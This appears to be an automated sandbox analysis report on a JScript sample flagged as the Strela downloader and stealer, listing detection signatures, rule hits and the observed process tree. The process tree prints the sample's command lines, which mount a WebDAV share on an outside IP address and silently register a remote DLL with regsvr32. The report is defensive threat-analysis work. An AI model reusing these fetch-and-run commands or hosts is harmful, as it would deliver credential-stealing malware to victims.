Edit tour
Windows
Analysis Report
126484723232027823.js
Overview
General Information
Detection
Strela Downloader, Strela Stealer
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Yara detected Strela Stealer
Gathers information about network shares
Opens network shares
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
- wscript.exe (PID: 3144 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\12648 4723232027 823.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 3876 cmdline:
"C:\Window s\System32 \cmd.exe" /c cmd /c net use \\ 193.143.1. 231@8888\d avwwwroot\ &&cmd /c r egsvr32 /s \\193.143 .1.231@888 8\davwwwro ot\1403416 25623863.d ll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5688 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1088 cmdline:
cmd /c net use \\193 .143.1.231 @8888\davw wwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - net.exe (PID: 4832 cmdline:
net use \\ 193.143.1. 231@8888\d avwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - cmd.exe (PID: 6768 cmdline:
cmd /c reg svr32 /s \ \193.143.1 .231@8888\ davwwwroot \140341625 623863.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - regsvr32.exe (PID: 3144 cmdline:
regsvr32 / s \\193.14 3.1.231@88 88\davwwwr oot\140341 625623863. dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security | ||
JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security | ||
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security | ||
JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: frack113: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
Networking |
---|
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |